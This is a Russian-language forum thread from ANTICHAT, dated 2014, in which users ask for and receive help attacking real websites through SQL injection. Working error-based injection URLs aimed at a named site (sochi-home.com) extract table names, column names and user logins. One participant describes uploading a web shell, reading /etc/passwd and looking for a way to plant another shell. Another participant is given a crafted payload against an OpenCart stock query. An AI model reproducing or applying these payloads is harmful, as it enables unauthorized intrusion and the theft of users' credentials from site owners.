ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.06.2014, 21:46
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Gulik
Gulik said:
Приветствую,
Помогите раскрутить иньекцию
Код:
Code:
http://sochi-h ome.com/objects/novostroyki.html?types=1
На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще
MySQL error based injection method
Через него из проги Havij получил ДБ и Таблицы
Код:
Code:
Current DB: urchenko_home
Table found: blocks
Table found: catalogcats
Table found: catalogitems
Table found: cats
Table found: content
Table found: forms
Table found: formsdata
Table found: formsfields
Table found: general
Table found: menu
Table found: menus
Table found: photos
Table found: photositems
Table found: poller
Table found: poller_option
Table found: poller_vote
Table found: ratings
Table found: responses
Table found: users
Но далее Havij идти не хочет и не выводит поля таблиц. http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+column_name+from+informati on_schema.columns+where+table_name=0x7573657273+li mit+0,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)--+g
|
|
|
22.06.2014, 23:08
|
|
Новичок
Регистрация: 15.03.2007
Сообщений: 20
Провел на форуме:
133734
Репутация:
19
|
|
Сообщение от kingbeef
kingbeef said:
http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+column_name+from+informati on_schema.columns+where+table_name=0x7573657273+li mit+0,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)--+g
Благодарю. Но у меня опять ЧП
Код:
Code:
http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+login+from+urchenko_home.users+limit+0,1),floor(rand(0)*2))x+from+urchenko_home.users+group+by+x)a)+--
Выдает такое
Subquery returns more than 1 row
|
|
|
|
22.06.2014, 23:22
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Gulik
Gulik said:
Благодарю. Но у меня опять ЧП
Код:
Code:
http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+login+from+urchenko_home.users+limit+0,1),floor(rand(0)*2))x+from+urchenko_home.users+group+by+x)a)+--
Выдает такое
Subquery returns more than 1 row http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+concat(mid(login,1,100))+f rom+users+limit+1,1),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)--+g
|
|
|
|
23.06.2014, 20:39
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Новый серв - новый вопрос.
Есть уязвимость site.com/1.php?id=1'
Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога: /home/1/online/site/htdocs/ , но к сожалению шелл сразу удалили
При попытке чтения '/etc/passwd' - всё ок.
При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.
Так и должно быть? Или я где-то намудрил?
И можно ли как-нибудь залить шелл? (file_priv=Y)
|
|
|
|
23.06.2014, 20:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
21918
Репутация:
6
|
|
Можно ли в FROM задать имя таблицы, с которой нужно извлечь данные - динамически?
|
|
|
|
25.06.2014, 00:32
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
В том-то и проблема, что все папки на запись
|
|
|
|
25.06.2014, 22:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Aniweste
Aniweste said:
Новый серв - новый вопрос.
Есть уязвимость
site.com/1.php?id=1'
Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога:
/home/1/online/site/htdocs/
, но к сожалению шелл сразу удалили
При попытке чтения '/etc/passwd' - всё ок.
При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.
Так и должно быть? Или я где-то намудрил?
И можно ли как-нибудь залить шелл? (file_priv=Y)
Возможно MySQL крутится на другом сервере, а сайт на другом.
|
|
|
|
27.06.2014, 02:15
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Возможно MySQL крутится на другом сервере, а сайт на другом.
Да, к сожалению
|
|
|
|
08.07.2014, 01:11
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 61
Провел на форуме:
478326
Репутация:
2
|
|
имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.
Самое простое что получилось сделать, это выудить название таблиц из information_schema.
Хотелось бы добраться до названий столбцов таблиц и самих значений.
Сообщение от None
SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '666') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
|
|
|
|
08.07.2014, 08:03
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от EksTasy
EksTasy said:
имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.
Самое простое что получилось сделать, это выудить название таблиц из information_schema.
Хотелось бы добраться до названий столбцов таблиц и самих значений.
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:
Сообщение от None
SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '
-666')-555*-1 as qty FROM (SELECT (1) stock_id, (2) seek)s JOIN (SELECT (3) name, (4) address, (5) surname)sd --
') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
